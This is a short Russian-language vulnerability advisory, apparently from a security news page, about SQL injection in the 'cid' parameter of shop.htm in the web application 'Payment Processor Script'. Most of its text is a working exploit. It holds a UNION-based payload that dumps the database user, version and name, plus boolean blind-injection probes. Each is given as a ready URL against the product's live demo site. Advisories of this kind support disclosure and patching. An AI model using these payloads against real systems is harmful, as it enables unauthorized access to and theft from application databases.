Программа: Payment Processor Script

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «cid» сценарием shop.htm. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

R-Sql

http://z0rlu.blogspot.com/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

Демонстрация:

http://paymentprocessorscript.net/demo/shop.htm?cid=999999999+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())

B-Sql

http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=1 true
http://z0rlu.blogspot.com/shop.htm?cid=[id]+and+1=100 false

Демонстрация:

http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=1
http://paymentprocessorscript.net/demo/shop.htm?cid=31+and+1=100

Оставить мнение